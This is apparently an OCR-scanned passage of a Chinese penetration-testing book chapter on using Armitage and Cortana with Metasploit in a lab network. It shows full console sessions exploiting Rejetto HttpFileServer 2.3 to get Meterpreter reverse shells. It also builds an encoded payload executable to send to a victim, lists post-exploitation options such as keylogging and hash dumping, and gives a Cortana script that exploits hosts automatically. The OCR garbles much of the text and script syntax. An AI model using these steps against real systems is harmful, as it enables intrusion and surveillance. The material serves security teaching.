] 192.168.10.109:445 is running Windows 2008 Web SP1 (build:6001) (name:WIN-SWIKKOTKSHX) (domain:WORKGROUP) 

*] 192.168.10.105:445 is running Windows 10 Pro (build:10586) (name:DESKTOP-PESQ21S) (domain:WORKGROUP) 

] 192.168.10.1:445 could not be identified: Unix (Samba 3.0.14a) 

] Scanned 4 of 4 hosts (100% complete) 


[*] 1 scan to go. 

msf auxiliary (smb. version) » use scanner/winrm/winrm auth methods 
msf auxiliary(winrm auth methods) » set THREADS 24 

THREADS => 24 

msf auxiliary(winrm auth methods) » set RPORT 5985 

RPORT => 5985 

msf auxiliary(winrm auth methods) » set RHOSTS 192.168.10.110 

RHOSTS => 192.168.10.110 

msf auxiliary(winrm auth methods) » run -j 

[*] Auxiliary module running as background job 

192.168.10.110:5985: Negotiate protocol supported 
[*] Scanned 1 of 1 hosts (100* complete) 


[*] Scan complete in 241.78s 
msf auxiliary(winrm auth methods) » 


在 扫描 结束 后 , 每 个 目标 网 络 的 主机 都 会 以 图 标的 形式 展示 在 第 二 个 窗 格 中 。 这些 图 标的 样 
式 取决 于 设备 和 操作 系统 的 类 型 。 


192.168.10.110 192.168.10.105 192.168.10.109 


在 上 图 中 可 以 看 到 Windows Server 2008, Windows Server 2012 和 Windows 10 系 统 。 接 下 来 查 


看 一 下 目标 上 运行 的 服务 。 0 
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10.2.1 漏洞 的 建 模 
在 目标 主机 上 单 击 鼠 标 右键 ， 然 后 在 弹出 的 菜单 中 选择 Services， 这 样 就 可 以 查看 当前 主机 

上 正在 运行 的 服务 。 扫 描 的 结果 与 下 面 的 屏幕 截图 类 似 。 
> (lj auxiliary 
> (lil exploit 
» (lil payload 
> (lij post 


192.168.10.110 


^w 


192. 168. 10. 109 


192. 168. 10. 105 


host | name | port à| proto | info 

192.168.10.109 http 80 tcp Microsoft IIS httpd 7.0 
192.168.10.109 msrpc 135 tcp Microsoft Windows RPC 
192.168.10.109 netbios-ssn 139 tcp Microsoft Windows 98 netbios-ssn 
192.168.10.109 microsoft-ds 445 tcp primary domain: WORKGROUP 
192.168.10.109 ssl/ms-wbt-server — 3389 tcp 

192.168.10.109 http 8081 tcp HttpFileServer httpd 2.3 
192.168.10.109 msrpc 49152 tcp Microsoft Windows RPC 
192.168.10.109 msrpc 49153 tcp Microsoft Windows RPC 
192.168.10.109 msrpc 49154 tcp Microsoft Windows RPC 
192.168.10.109 msrpc 49155 tcp Microsoft Windows RPC 
192.168.10.109 msrpc 49156 tcp Microsoft Windows RPC 
192.168.10.109 msrpc 49157 tcp Microsoft Windows RPC 


在 192.168.10.109 主 机 上 运行 着 很 多 服务 , 例如 IIS 7.0 , Microsoft Windows RPC, HttpFileServer 
文 些 服 务 中 的 一 个 作 


httpd 2.3， 等 等 。 通 过 Armitage 找 到 与 这 


为 目标 。 


10.2.2 ”查找 匹配 模块 


文 些 服务 相 匹 配 的 渗透 模块 ， 然 后 将 这 


可 以 通过 以 下 方法 找到 对 应 的 渗透 模块 : 首先 在 Armitage 导 航 栏 上 选择 Attacks 选 项 卡 ,， 在 弹 
出 的 下 拉 列 表 框 中 选择 Find Attack 选 项 。Find Attack 选 项 将 会 根据 目标 主机 上 运行 的 服务 与 渗透 
模块 数据 库 中 的 内 容 进行 比 对 。 在 与 数据 库 比 对 的 过 程 结 束 以 后 , 将 会 弹出 一 个 提示 框 ,提示 的 
内 容 如 下 面 的 屏幕 截图 所 示 。 


Message 


Attack Analysis Complete... 


e 


Happy hunting! 


You will now see an 'Attack' menu attached 
to each host in the Targets window. 
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单 击 OK 按钮 以 后 , 我 们 就 能 看 到 ， 当 在 主机 上 单 击 鼠 标 右键 时 , 弹出 菜单 中 一 个 名 为 Attack 
的 选项 变 得 可 用 了 。 在 它 的 下 一 级 菜单 中 会 显示 出 可 以 用 来 渗透 目标 主机 的 渗透 攻击 模块 。 


10.3 ”使 用 Armitage 进行 渗透 


当 一 台 主 机 上 的 Attack 荣 单 可 用 时 ， 对 目标 进行 渗透 的 准备 工作 就 完成 了 。 我 们 的 攻击 目标 
是 HttpFileServer 2.3， 采 用 Attack 荣 单 上 Rejetto HTTPFileServer Remote Command Execution 渗 透 模 
块 进行 攻击 。 单 击 Exploit 选 项 会 弹出 一 个 新 的 窗口 , 其 中 展示 了 所 有 设置 。 我 们 的 设置 如 下 所 示 。 


T 
[ 


p 


192.168.10.110 192. 168. 10. 109 192. 168. 10. 105 


rE 


Attack 192.168.10.109 e o 0 


Rejetto HttpFileServer Remote Command Execution 


> 


Rejetto HttpFileServer (HFS) is vulnerable to remote command execution attack due to a 
poor regex in the file ParserLib.pas. This module exploits the HFS scripting commands by 
usina '%00' to bvpass the filterina. This module has been tested successfullv on HFS 


— 


Option à | Value | 


Proxies 

192.168.10.109 
RPORT 
SRVHOST 0.0.0.0 


Targets: |0 => Automatic v) 


[V] Use a reverse connection 


LJ Show advanced options 


Launch 


在 所 有 选项 都 设置 完毕 之 后 , 单 击 Launch 来 运行 这 个 针对 目标 的 渗透 模块 。 在 启动 了 渗透 模 
块 以 后 ， 将 在 界面 的 第 三 个 窗 格 中 看 到 渗透 模块 在 目标 上 的 执行 过 程 ， 如 下 图 所 示 。 


| (id auxiliary 
I" 窗 exploit 
|- (lili payload — 


|> (li post PT Ta T y 


MPa 


192. 168. 10, 110 192. 168. 10. 109 192. 168. 10. 105 
WIN- SWIKKOTKSHX\mm @ WIN-SWIKKOTKSHX 


Console X | Services X | exploit X 


msf > use exploit/windows/http/rejetto_hfs_exec 

msf exploit(rejetto_hfs_exec) > set TARGET 0 

TARGET => 0 

msf exploit(rejetto_hfs_exec) > set PAYLOAD windows/meterpreter/reverse_tcp 
PAYLOAD => windows/meterpreter/reverse_tcp 

msf exploit(rejetto hfs exec) > set LHOST 192. 168. 10. 104 
LHOST => 192. 168. 10. 104 

msf exploit(rejetto_hfs_exec) > set LPORT 21427 

LPORT => 21427 

msf exploit(rejetto_hfs_exec) > set RPORT 8081 

RPORT => 8081 

msf exploit(rejetto hfs exec) > set RHOST 192. 168. 10. 109 
RHOST => 192. 168. 10. 109 

msf exploit(rejetto_hfs_exec) > set TARGETURI / 
TARGETURI => / 

msf exploit(rejetto_hfs_exec) > set SRVPORT 8080 
SRVPORT => 8080 

msf exploit(rejetto_hfs_exec) > set SRVHOST 0.0.0.0 
SRVHOST => 0.0.0.0 

msf exploit(rejetto_hfs_exec) > set HTTPDELAY 10 
HTTPDELAY => 10 

msf exploit(rejetto_hfs_exec) > exploit -j 

[*] Exploit running as background job. 

*] Started reverse TCP handler on 192. 168. 10. 104:21427 
] Using URL: http://0.0.0.0:8080/Fegelp 

] Local IP: http://192. 168. 10. 104: 8080/Fegelp 

] Server started. 

*] Sending a malicious request to / 

] 

] 

] 


192.168.10.109 rejetto_hfs_exec - 192.168.10.109:8081 - Payload request received: /Fegelp 

Sending stage (957487 bytes) to 192.168.10.109 

Meterpreter session 1 opened (192.168.10.104:21427 -> 192.168.10.109:49281) at 2016-07-12 22:57:07 +0530 
Tried to delete *TEMPNcaiqDMq.vbs, unknown result 

[*] Server stopped. 


我 们 看 到 Meterpreter 窗 口 已 经 启动 ， 这 意味 着 已 经 成 功 地 渗透 了 目标 主机 。 此 外 ， 目 标 主机 
的 图 标 会 被 红色 闪电 围绕 ， 这 意味 着 我 们 已 经 拥有 了 该 主机 的 控制 权 。 


> 


10.4 ”使 用 Armitage 进行 后 渗透 攻击 


Armitage 的 加 入 使 得 后 渗透 阶段 变 得 特别 轻松 ， 简 单 到 只 需 单 击 鼠 标 就 可 以 完成 所 有 ien 
作 。 当 想 执行 后 渗透 模块 的 时 候 ， 只 需 在 成 功 渗透 了 的 主机 上 面 单 击 鼠标 右键 ， 然 后 选择 下 拉 菜 
单 中 的 Meterpreter 选 项 。 这 一 切 如 下 图 所 示 。 


Attack 

Login 
Meterpreter 4 
Services 

Scan 


Access Escalate Privileges 


Interact Steal Token 
Explore 


Host Pivoting 
ARP Scan... 


Kill 


Dump Hashes 
Persist 
Pass Session 
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选择 Meterpreter 将 会 显示 出 所 有 的 后 渗透 模块 。 假 设 我 们 希望 提高 权限 或 者 获得 系统 级 的 管 
里 权 限 ， 那 么 可 以 将 鼠标 移动 到 子 下 拉 菜 单 的 Access 处 ， 然 后 单 击 所 需 功 能 的 按钮 即 可 。 


Md 


子 菜单 nteract 提 供 了 以 下 功能 : 获得 目标 计算 机 的 cmd 命 令 行 、 建 立 另 一 个 Meterpreter， 等 等 。 
子 菜单 Explore 提 供 了 Browse Files, Show Processes, Log Keystrokes, Screenshot, Webcam Shot 和 Post 
Modules 选 项 ， 用 于 启动 其 他 未 在 当前 荣 单 中 出 现 的 后 渗透 模块 ， 如 下 面 的 屏幕 截图 所 示 。 


( Tram 
Attack > 
Login > 


Tio Mererpretend > Access » 
BINE SACK Interact » 
U 5 ML Scan 
Explore dd Browse Files 
Host > | Pivoting » Show Processes 


ARP Scan... Log Keystrokes 


Kill Screenshot 
Webcam Shot 


= ey - Post Modules 


可 以 在 Browse Files 选 项 上 单 击 以 运行 一 个 简单 的 后 渗透 模块 ， 如 下 图 所 示 。 


篇 | |CAUsersimmDesktopYabb497bd93aff9fa3379b2aaf73fc9c7-hfs2.3 288 


D 4|Name | Size | Modified Mode 

(Mj 。 %TEMP% 2016-06-20 10:32:56 +0530 40777/rwxrwxrwx 

[^] ecqxi 2016-06-19 20:34:34 «0530 40777/rwxrwxrwx 
hfs.exe 742kb 2014-02-17 02:28:52 +0530 100777/rwxrwxrwx 


Upload... | | Make Directory | | List Drives | | Refresh 
J l J 


只 需 轻 轻 一 点 鼠标 就 可 以 轻松 地 上 传 、 下 载 或 者 浏览 任何 目标 系统 中 的 文件 。 这 就 是 
Armitage 的 魅力 一 一 一 切 都 以 图 形 化 的 形式 展示 在 你 面前 ， 让 你 的 工作 远离 复杂 的 命令 语法 。 


这 里 介绍 了 我 们 使 用 Armitage 开 展 的 一 次 远程 渗透 攻击 。 接 下 来 使 用 Armitage 开 展 一 次 客户 
端的 渗透 测试 。 


10.5 ”使 用 Armitage 进行 客户 端 攻击 


客户 端 攻击 需要 得 到 受害 者 的 配合 , 在 之 前 的 一 些 章节 中 我 们 已 经 见识 到 了 这 些 手段 。 我 们 
现在 来 攻击 目标 网 络 中 的 第 二 台 计 算 机 , 这 台 计 算 机 上 运行 着 Windows 10 操 作 系统 。 在 这 次 渗透 
攻击 中 , 我 们 将 会 创建 一 个 简单 的 攻击 载荷 , 将 其 发 送 给 受害 者 , 然后 打开 我 们 的 监听 器 耐心 地 
等 待 受害 者 打开 这 个 攻击 载荷 。 我 们 对 这 种 渗透 攻击 的 工作 流程 并 不 陌生 , 在 之 前 的 章节 中 也 已 
经 多 次 使 用 Metasploit 和 SET 等 工具 完成 过 相同 的 任务 了 。 在 接 下 来 的 学 习 中 , 我 们 将 会 领略 使 用 
图 形 化 界面 创建 攻击 载荷 与 在 命令 行 下 创建 攻击 载荷 的 真正 区 别 。 
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让 我 们 来 看 看 创建 攻击 载荷 和 监听 器 的 过 程 ， 步 又 如 下 所 示 。 


(1) 使 用 搜索 框 查找 一 个 攻击 载荷 ， 或 者 在 层次 结构 中 找到 我 们 想 要 使 用 的 攻击 载荷 。 当 前 
实验 使 用 的 攻击 载荷 是 Meterpreter 中 的 reverse_tcp， 它 所 在 的 具体 位 置 如 下 图 所 示 。 


"reverse https 
reverse ipv6 http 
reverse ipv6 https 
reverse ipv6 tcp 
reverse nonx tcp 
reverse ord tcp 


J 


] 


D 


PRRI 


reverse_tcp_allports 

reverse_tcp_dns 

metsvc bind tcp 

metsvc reverse tcp 

E e patchupdllinject 

> (liljópatchupmeterpreter 
£x s u 


2L? 


- 


[^] reverse http 


li reverse tcp 


Q) 如 果 想 要 选中 的 攻击 载荷 开始 工作 ， 需要 双击 该 攻击 载 答 。 双击 之 后 会 弹出 一 个 对 话 框 ， 
在 这 个 对 话 框 上 会 显示 出 该 攻击 载 答 需要 设置 的 所 有 选项 。 这 个 过 程 如 下 图 所 示 。 


windows/meterpreter-_reverse-tcp 


Windows Meterpreter Shell, Reverse TCP Inline 


Connect back to attacker and spawn a Meterpreter shell 


3 


LHOST 192.168.10.104 


Template 十 


Option å | Value | 
| EATITNIT 

Iterations 3 

KeepTemplateWorking 


Output: |exe M 


Lj] Show advanced options 


Launch 


(3) 完成 选项 的 设置 (例如 LPORT) 后 ， 根据 需要 选择 Output 格 式 A 
的 是 Windows 系 统 ， 所 以 我 们 选择 exe 作 为 输 出 的 格式 ， 这 意味 着 这 


这 
文 是 一 


里 我 们 的 目标 主机 上 运行 
一 个 可 执行 文件 。 当 所 有 
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需要 设置 的 选项 都 配置 完毕 ， 单 击 Launch 创 建 这 个 攻击 载荷 。 接 着 这 里 将 会 弹出 男 一 个 对 话 框 ， 
如 下 图 所 示 。 


Save 

Look n CE 
篇 a (88 git 
@ core (ii ha 
(8j Desktop (ii m 
(ij Dropbox 入 np 
(Bj forensics i pc 

File Name: 

Files of Type: |All Files X 


Save Cancel 


(4) 在 这 个 步骤 中 ，Armitage 将 会 提示 我 们 保存 生成 的 攻击 载荷 。 我 们 需要 输入 自 定 义 的 攻 
击 载荷 名 称 ， 然 后 保存 这 个 文件 。 接 着 ， 需 要 建立 一 个 监听 顺 。 在 渗透 攻击 成 功 后 ， 这 个 监听 器 
将 会 处 理 所 有 来 自 目标 主 机 的 通信 连接 。 凭 借 着 这 个 监听 器 , 我们 就 可 以 对 目标 主机 进行 控制 了 。 


(5) 为 了 给 攻击 载荷 创建 一 个 监听 器 ， 我 们 需要 在 Armitage 选 项 卡 上 选中 Listener， 然 后 选中 
Reverse。 这 时 就 会 弹出 一 个 对 话 框 ， 这 个 对 话 框 中 会 要 求 设 置 端口 号 和 监听 器 的 类 型 ， 如 下 
所 示 。 


Create Listener © © o 


Type: meterpreter vj 
Start Listener | 


(6) 输入 端口 号 8888， 选 择 监 听 器 的 类 型 为 Meterpreter， 然 后 单 击 Start Listener 按 钮 。 


(7) 现在 ， 将 这 个 攻击 载荷 文件 发 送 给 受害 者 。 一 旦 受害 者 执行 了 这 个 文件 ， 我 们 就 会 获得 
这 个 系统 的 管理 权限 。 这 个 文件 看 起 来 与 下 面 的 屏幕 截图 类 似 。 Ol 


* (iij auxiliary 
> (id exploit 
>» Ñ payload 
> [^] post 


SWIKKOTKSHX 


Console X | windows/meterpreter reverse tcp. X | 


msf » use exploit/multi/handler 

msf exploit(handler) » set PAYLOAD windows/meterpreter reverse tcp 
PAYLOAD => windows/meterpreter reverse tcp 

msf exploit(handler) » set LHOST 192.168.10.104 

LHOST => 192.168.10.104 

msf exploit(handler) » set LPORT 8888 

LPORT => 8888 

msf exploit(handler) » set Iterations 3 

Iterations => 3 

msf exploit(handler) » set Encoder x86/shikata ga nai 

Encoder => x86/shikata ga nai 

msf exploit(handler) » set EXITFUNC process 

EXITFUNC => process 

msf exploit(handler) » set ExitOnSession false 

ExitOnSession => false 

msf exploit(handler) » exploit -j 

[*] Exploit running as background job. 

[*] Started reverse TCP handler on 192.168.10.104:8888 

[*] Starting the payload handler... 

[*] Meterpreter session 3 opened (192. 168. 10. 104:8888 -> 192.168.10.105:13589) at 2016-07-12 23:23:02 +0530 


现在 可 以 在 目标 主机 上 执行 所 有 后 渗透 方法 了 , 这 一 切 正 如 在 前 一 节 中 做 过 的 那样 。 先 来 看 
看 可 以 利用 目标 主机 的 哪些 文件 。 首 先 选 择 Meterpreter 的 子 菜单 中 的 Explore， 然 后 在 下 一 级 菜单 
中 选择 Browse Files， 如 下 面 的 屏幕 截图 所 示 。 


* (lij auxiliary 
» (lij exploit 
» (li payload 
» (lili post 


.10. 110 192.168. 10. 109 
P-PESQ21S\Apex G DESKTOP. WIN- SWIKKOTKSHX\mm @ WIN-SWIKKOTKSHX 


[console x [ windows/meterpreter reverse tcp. x [ Files. x 
@ | |o 
D a| Name | size | Modified Mode 
@  $Recycle.Bin 2016-01-15 21:51:20 +0530 40777/rwxrwxrwx 
[7] AdwCleaner 2016-01-19 13:20:46 +0530 40777/rwxrwxrwx. 
[SI Config.Msi 2016-06-13 14:40:30 +0530 40777/rwxrwxrwx. 
@ Documents and settings 2015-0710 17:51:38 +0530 40777/Írwxrwxrwx 
[Si Intel 2016-01-15 22:18:03 +0530 40777/rwxrwxrwx 
证 MSOCache 2016-01-15 23:17:49 «0530 40555/r-xr-xr-x 
[^7] PerfLogs 2015-10-30 12:54:24 «0530 40777/rwxrwxrwx. 
El Perl 2016-01-19 20:50:19 +0530 40777/rwxrwxrwx 
@ Program Files 2016-06-20 20:13:59 +0530 40555/rxrxr-x 
篇 Program Files (x86) 2016-07-05 13:06:55 +0530 40555/r-xr-xr-x 
篇 ProgramData 2016-05-22 17:13:09 +0530 40777/rwxrwxrwx 
(i Python27 2016-01-20 00:56:49 +0530 40777/rwxrwrwx 
[7] Recovery 2016-02-22 23:20:49 +0530 40777/rwxrwxrwx. 
[-] Ruby23-x64 2016-04-09 15:00:20 +0530 40777/rwxrwxrwx. 
[^7] Sandbox 2016-02-04 11:58:17 «0530 40555/r-xrxrx 
[SI System Volume Information 2016-07-10 16:09:01 +0530 40777/rwxrwxrwx 
(ij — TimHilone 2016-04-20 16:49:17 +0530 40777/rwxrwxrwx 
篇 Users 2016-02-22 23:23:50 +0530 40555/r-xr-xr-x 
[I Windows 2016-07-12 14:54:36 +0530 40777/rwxrwxrwx 
@ xampp 2016-01-20 01:31:35 +0530 40777Írwxrwxrwnx 
hiberfil.sys 9mb 1970-01-01 05:30:00 +0530 0202/-w-----w- 
BOOTNXT 1b 2015-10-30 12:48:34 +0530 100666/rw-rw-rw- 
abc.txt 14kb 2016-03-01 22:43:34 +0530 100666/rw-rw-rw- 
abc2.txt 16kb 2016-03-01 22:43:44 +0530 100666/rw-rw-rw- 
bootmgr 386kb 2015-07-10 16:30:31 «0530 100444/r- 
pagefile.sys 2gb 2016-07-02 19:22:26 +0530 100666/rw-rw-rw- 
r2.pcap 218b 2016-03-14 21:27:24 +0530 100666/rw-rw-rw- 
raw.pcap 357b 2016-03-07 00:01:34 +0530 100666/rw-rw-rw- 
swapfile. sys 16mb 2016-07-02 19:22:26 +0530 100666/rw-rw-rw- 
| Upload... | | Make Directory | | List Drives | | Refresh | 
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同样 ， 我 们 也 可 id 目标 计算 机 上 正 运 行 着 哪些 进程 。 首 先 选择 Meterpreter 的 子 菜单 中 的 
Explore， 然 后 在 下 一 级 菜单 中 选择 Show Processes。 目 标 主机 上 运行 的 进程 如 下 图 所 示 。 


» (lij auxiliary 
» (lj exploit 
* 篇 payload 
» (iij post. 

zz | 
[console xT CARET reverse tcp. X [Files 3 X [ Processes 3. X 
PID 4| Name | Arch |S... | User Path 
o [System Process] j 
4 System x64 0 
388 — smssexe x4 0 
588 — csrss.exe x64 0 
716 wininit. exe x64 0 
860 Services.exe x64 0 
872 Isass.exe x64 0 NT AUTHORITY\SYSTEM C:WindowslSystem32Vsass.exe 
960 Svchost,exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 
1020  svchost.exe x64 0 NT AUTHORITYWNETWORK SERVICE C:\Windows\System32\svchost.exe 
1044  svchost.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\svchost.exe 
1104 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE C:\Windows\System32\svchost,exe 
1112  svchost.exe x64 0 NT AUTHORITMILOCAL SERVICE C:\Windows\System32\svchost.exe 
1212  svchostexe X64 0 — NT AUTHORIMISYSTEM C:\Windows\System32\svchost.exe 
1220  svchost.exe x64 0 NT AUTHORITYINETWORK SERVICE C:\Windows\System32\svchost.exe 
1228  svchost.exe x64 0 NT AUTHORITYLOCAL SERVICE C:\Windows\System32\svchost.exe 
1296  nvscpapisvr.exe x86 0 — NT AUTHORITASYSTEM C:\Program Files (X86) NVIDIA Corporation\3D Visionnvscpapisvr.exe 
1308  nwsvc.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\nwsvc.exe 
1384  WUDFHost.exe x64 0 NT AUTHORITYLOCAL SERVICE C:\Windows\System32\WUDFHost.exe 
1404  csrss.exe x64 8 
1516  igfxCUIService.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\igfxCUIService. exe 
1552 svchost.exe x64 0 NT AUTHORITYLOCAL SERVICE C:\Windows\System32\svchost.exe 
1936  WINWORD.EXE x86 8 DESKTOP-PESQ21SApex C:\Program Files (x86)\Microsoft Office\Office1 2WINWORD.EXE 
1968  sbieSvc.exe x64 0 — NT AUTHORITASYSTEM C:\Program FilesSandboxielSbieSvc. exe 
2064  svchost.exe x64 0 NT AUTHORITYINETWORK SERVICE C:\Windows\System32\svchost.exe 
2168 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM C:\Windows\System32\spoolsv.exe 
2312  AppleMobileDeviceService.exe x64 0 — NT AUTHORITASYSTEM C:\Program Files\Common Files\Apple\Mobile Device SupportVAppleMobileDeviceService, exe 
2336  vmware-tray.exe x86 8 DESKTOP-PESQ21SMpex C:\Program Files (x86)\VMware\VMware Workstation\vmware-tray. exe 
2648  mDNSResponder.exe x64 0 NT AUTHORITY\SYSTEM C:\Program Files\Bonjour\mDNSResponder. exe 
2656 IpOverUsbSvc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86))Common Files\Microsoft Shared\Phone Tools\CoreCon\11.0\bin\pOverUsbSvc.exe 
2664  vmware-authd.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files (x86)\VMware\VMware Workstation\vmware-authd. exe 
2672 vmware-usbarbitrator64.exe x64 0 NT AUTHORITASYSTEM C:\Program Files (x86)|Common Files\VMware\USBWwmware-usbarbitrator64,exe 
2680  GfExperienceService.exe x64 0 — NT AUTHORITASYSTEM C:\Program Files\NVIDIA CorporationiGeForce Experience ServiceVGfExperienceService.exe 
2700  sqhwiter.exe x64 0 — NT AUTHORITASYSTEM C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe 

| Kl | | Migrate | | Log Keystrokes | | inject | | Steal Token | | Refresh | 


有 关 客 户 端 渗透 攻击 的 内 容 已 经 介绍 完了 , 接 下 来 我 们 要 使 用 Cortana 语 言 亲 自 编 写 Armitage 
脚本 。 


10.6 Armitage 脚本 编写 


Cortana 是 一 种 脚本 型 语言 , 在 Armitage 中 用 来 创建 攻击 向 量 。 渗透 测试 工程 师 们 使 用 Cortana 
tí TELAM 试 ， 对 攻击 向 量 进行 克隆 ,使 其 像 机 器 人 一 样 工作 。 另 外 , 红 队 通常 是 指 一 个 独立 
的 团队 ， 这 个 团队 会 对 目标 组 织 发 起 挑战 ， 以 此 提高 它 的 安全 措施 和 工作 效率 。 


Cortana 利 用 脚本 语言 来 使 用 Metasploit 的 远程 过 程 客户 端 ， 这 为 自动 化 控制 Metasploit 操 作 与 
管理 数据 库 提供 了 便利 条 件 


此 外 , Cortana 语 言 可 以 按照 渗透 测试 工程 师 的 思路 自动 响应 系统 的 特定 事件 。 假设 我 们 正在 

对 一 个 包含 了 100 台 主机 的 网 络 进行 渗透 测试 , 其 中 29 台 主机 上 运行 着 Windows Server 2012 系 统 ， 

其 他 主机 上 运行 着 Linux 操 作 系统 。 我 们 需要 一 种 方法 ， 它 可 以 自动 使 用 Rejetto HTTPFileServer 

Remote Command Execution 渗 透 模 块 对 这 些 在 8081 端 口上 运行 着 HttpFileServer httpd 2.3 软 件 的 
Windows Server 2012 系 统 进行 渗透 。 
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我 们 可 以 轻松 地 完成 这 样 一 段 脚本 来 实现 这 个 任务 的 自动 化 ， 与 此 同时 还 能 节省 大 量 时 间 。 
一 旦 有 符合 条 件 的 主机 上 线 , 立刻 使 用 rejetto_hfs_exec 进 行 渗透 工作 , 成 功 后 还 会 在 其 上 执 
行 预定 的 后 渗透 测试 。 


10.6.1 Cortana 基础 知识 


使 用 Cortana 编 写 一 个 简单 的 攻击 模块 脚本 将 有 助 于 我 们 直观 地 理解 这 种 语言 。 因此 , 来 看 一 
个 关于 自动 攻击 Windows 操 作 系 统 上 8081 端 口 的 示例 脚本 : 


on service add 8081 ( 
println("Hacking a Host running $1 (" . host os($1) . ")"); 
if (host os($1) eq "Windows 7") ( 
exploit("windows/http/rejetto hfs exec", $1, $(RPORT -» 
"8081")); 
j 
j 
当 使 用 Nmap 或 者 MSF 扫描 发 现 目 标的 8081 端 口 处 于 开放 状态 时 ， 前 述 脚本 便 会 执行 。 这 段 
脚本 会 检查 目标 系统 是 否 为 Windows 7; 如 果 结 果 为 真 ，Cortana 就 会 自动 利用 rejetto_hfs_ 
exec 渗 透 模块 攻击 目标 的 8081 端 口 。 


在 这 上 段 脚 本 中 ，s1 指 明 主 机 的 JP 地址 ; Print_ln 函 数 输出 打印 字符 和 变量 ; host_os 作 为 
一 个 Cortana 中 编写 的 函数 可 以 返回 主机 的 操作 系统 类 型 ， 也 数 exploit 在 参数 $1 指定 的 IP 地 址 
启动 一 个 渗透 模块 ;，% 表 示 为 渗透 模块 设置 的 选项 ， 如 果 服 务 运行 在 不 同 的 端口 或 者 需要 其 他 细 
节 时 ， 可 以 通过 % 设 置 这 些 渗 透 模块 的 选项 ; service ada 8081185E T TERRE Um AUT 
放 的 8081 端 口 时 触发 的 事件 。 


将 这 个 脚本 保存 。 然 后 在 Armitage 中 载 人 这 个 脚本 。 首 先 在 导航 栏 上 选择 Armitage 选 项 卡 ， 
然后 单 击 Scripts。 


| | Console X | Workspaces X | Scripts X 
| name |flags | 
| Load | | Unload | | Console | | Scripts | 


为 了 在 系统 上 运行 这 个 脚本 ， 需 要 执行 以 下 步 又。 
(1) 单 击 Load 按 钮 ， 然 后 在 Armitage 中 载 人 一 个 Cortana 脚 本 ， 过 程 如 下 。 
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Open 


Lookin: | cortana sj (6; )| e J | | Gre je) 


File Name: 8081.cna 


Files of Type: |All Files Y 
Cancel | 


(2) 选择 需要 的 脚本 然后 单 击 Open。 单 击 之 后 将 会 在 Armitage 中 载 人 这 个 脚本 ， 如 下 图 所 示 。 


— "a 


Console X | Workspaces X | Scripts X 


name | flags 
[root/Desktop/cortana/8081.cna 


Unload Console Scripts 


Q) 接 下 来 ,进入 Cortana 控 制 台 然后 输入 命令 help， 这 样 可 以 列 出 在 处 理 脚本 时 可 以 使 用 的 
各 种 选项 。 


(4) 如 果 你 想 查看 当 Cortana 脚 本 运行 时 都 执行 了 哪些 操作 ， 可 以 输入 命令 1ogon ， 在 其 后 面 
输入 脚本 的 名 称 。1ogon 命 令 将 为 脚本 提供 日 志 记 录 功 能 ， 并 会 记录 由 脚本 执行 的 每 一 个 操作 ， 
整个 过 程 如 下 图 所 示 。 


Scripts X | Cortana X 


cortana> help 


Commands 


tron 
unload 


cortana> logon 8081. cna 
Logging '8081.cna' 


cortana> | 
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(5) 现在 对 目标 执行 一 次 深度 扫描 。 首先 选中 Hosts 选 项 卡 , 然后 在 弹出 的 Nmap 子 菜单 中 选中 


Intense Scan, 


(6) 正如 我 们 清楚 看 到 的 那样 ， 一 人 台 开 放 着 8081 端 口 的 主机 被 发 现 了 。 让 我 们 回 到 Cortana 控 
制 台 来 查看 是 否 发 生 了 什么 。 


Armitage View Hosts Attacks Workspaces Help 


* (lij auxiliary 


> (id exploit 4 K T 9 


p 


» 篇 payload ld AC ^ 
* (ij post 


192, 168, 10, 109 
TKSHX\mm @ WIN-SWIKKOTKSHX 


Console X | Scripts X | Cortana X | nmap X | nmap x] nmap X | nmap X | 


cortana> logon 8081.cna 

Logging '8081.cna' 
Hacking a Host running 192.168.10.109 (Windows 7) 
[22:29:42] metasploit module.compatible payloads('windows/http/rejetto hfs exec') at 
internal.sl1:505 
[22:29:42] metasploit module.execute('exploit', 'windows/http/rejetto hfs exec', %(LHOST => 
'192.168.10.104', RPORT -» '8081', LPORT => 30764, RHOST => '192.168.10.109', PAYLOAD => 
'windows/meterpreter/bind tcp', TARGET => '0')) at internal.sl:499 
cortana» 


(7) Cortana 已 经 通过 自动 运行 的 渗透 模块 搞定 了 目标 主机 。 


正如 我 们 现在 看 到 的 那样 , Cortana 可 以 帮助 我 们 轻松 地 实现 渗透 攻击 的 自动 化 运行 。 在 接 下 
来 的 几 节 中 ， 我 们 将 会 看 到 如 何 实现 后 渗透 攻击 的 自动 化 ， 以 及 如 何 使 用 Cortana 控 制 Metasploit 


中 的 功能 。 


10.6.2 ”控制 Metasploit 


Cortana 能 很 好 地 控制 Metasploit 的 功能 。 可 以 使 用 Cortana 对 Metasploit 发 出 各 种 命令 。 让 我 们 
通过 一 个 示例 来 更 好 地 理解 Cortana 对 Metasploit 的 控制 : 


cmd async("hosts"); 

cmd async("services"); 

on console hosts ( 

printlin("Hosts in the Database"); 
printlim("- $3. *)5 


} 


on console_services { 
println("Services in the Database"); 
printlm(* $3. "); 


} 


在 这 段 脚 本 中 , 命令 cmq_async 发 送 hosts 命 令 和 services 命 令 到 Metasploit 并 确保 它们 被 


执行 。 此 外 ， 这 些 console_* 函 数 被 月 


来 打印 这 条 命令 的 输出 。Metasploit 将 执行 这 些 命令 。 然 
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而 ， 为 了 打印 这 个 输出 内 容 ， 需 要 定义 函数 console_*。 另 外 ，$3 是 一 个 变量 ， 在 其 中 保存 了 
命令 的 输出 内 容 。 


在 ready.cna 脚 本 加 载 完毕 之 后 ， 打 开 Cortana 控 制 台 查看 输出 的 内 容 。 


Hosts in the Database 

Hosts 

address mac name os name os flavor os sp purpose info comments 
192.168.10.109 08: 00:27:84:55:8c WIN- SWIKKOTKSHX Windows 7 client 
Services in the Database 

Services 

host port proto name state info 

192. 168. 10. 109 80 tcp http open Microsoft IIS httpd 7.0 

192. 168. 10.109 135 tcp msrpc open Microsoft Windows RPC 
192.168.10.109 139 tcp netbios-ssn open Microsoft Windows 98 netbios-ssn 
